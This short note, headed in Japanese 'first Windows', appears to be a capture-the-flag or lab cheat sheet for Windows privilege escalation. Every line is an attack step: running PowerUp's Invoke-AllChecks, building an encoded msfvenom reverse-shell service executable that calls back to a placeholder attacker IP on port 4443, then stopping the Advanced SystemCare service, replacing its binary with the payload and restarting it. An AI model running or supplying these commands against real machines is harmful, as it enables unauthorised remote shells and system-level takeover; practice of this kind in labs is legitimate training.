初めての windows
upload /PowerUp.ps1
Invoke-AllChecks
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe
sc stop AdvancedSystemCareService9
copy ASCService C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\ASCService.exe
sc start AdvancedSystemCareService9